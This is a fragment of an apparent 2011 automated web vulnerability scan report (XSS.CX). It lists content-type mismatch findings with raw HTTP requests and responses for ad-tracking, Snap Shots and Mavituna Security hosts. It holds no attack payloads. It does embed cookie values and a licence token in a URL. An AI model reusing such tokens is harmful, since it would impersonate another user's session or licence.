GET /pixel.jsp?id=2773,2759,2761,2791&type=script&ipid=10143&sfid=0 HTTP/1.1 Host: pixel.intellitxt.com Proxy-Connection: keep-alive Referer: http://spamlaws.us.intellitxt.com/iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2759%2C2761%2C2791%26type%3Dscript%26ipid%3D10143%26sfid%3D0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eoAAACucBAAAAAQAAAS+SL16gAAAK1QEAAAABAAABL5IvXqAAAArHAQAAAAEAAAEvki9eoAAAAACIhXZ+; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:08 GMT; Path=/ Content-Type: text/html Content-Length: 1602 Date: Tue, 26 Apr 2011 14:21:08 GMT Connection: close
The response contains the following Content-type statement:
Content-Type: text/html; charset=UTF-8
The response states that it contains HTML. However, it actually appears to contain CSS.
Request
GET /snap_shots.js HTTP/1.1 Host: shots-s.snap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
//<!-- /*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved. * Your use of this code is subject to the Snap Shots Terms of Service * located at https://account.snap ...[SNIP]...
//<!-- /*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved. * Your use of this code is subject to the Snap Shots Terms of Service * located at https://account.snap ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /support/checkupdate/?lic=AAEAAAD/////AQAAAAAAAAAGAQAAAD4wNDYyLTZFNTctOTc3OS1EOTk4LUNBNTctRUU1QS1NRjQ0Q1pFNjhZRTY3QU0wRjRQQTZWUkgzQzRIUlJLVgs= HTTP/1.1 Host: www.mavitunasecurity.com
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 87 Content-Type: text/html; charset=utf-8 X-Powered-By: ASP.NET Date: Tue, 26 Apr 2011 12:27:30 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>SecurityMe ...[SNIP]...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Deter ...[SNIP]...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Deter ...[SNIP]...
Report generated by XSS.CX at Tue Apr 26 09:34:48 CDT 2011.